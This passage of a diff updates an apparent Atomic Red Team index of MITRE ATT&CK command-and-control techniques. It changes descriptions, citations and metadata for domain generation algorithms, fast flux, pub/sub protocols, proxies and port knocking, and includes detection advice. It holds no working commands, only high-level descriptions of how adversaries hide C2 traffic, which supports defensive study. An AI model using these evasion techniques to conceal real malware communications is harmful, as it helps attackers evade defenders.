         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -43984,9 +44407,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -44032,7 +44513,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -44064,7 +44544,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -44086,22 +44566,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -44123,7 +44601,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -44148,7 +44626,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -44232,7 +44709,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -44296,11 +44772,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -44384,7 +44859,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -44415,7 +44889,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -44435,8 +44909,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -44458,8 +44932,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -44521,7 +44993,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -44569,7 +45040,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -44623,7 +45093,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -44656,7 +45125,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -44676,8 +45145,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -44715,7 +45182,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -44743,42 +45210,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -44787,17 +45234,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -44829,7 +45298,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -44846,8 +45315,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -44867,7 +45334,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -44890,8 +45357,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -44916,7 +45381,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -44941,8 +45406,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -45007,7 +45470,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -45031,7 +45493,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -45056,21 +45518,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -45089,7 +45566,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -45103,6 +45580,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -45116,7 +45598,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests:
     - name: Tor Proxy Usage - Debian/Ubuntu/FreeBSD
@@ -45149,7 +45630,7 @@ command-and-control:
         elevation_required: true
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
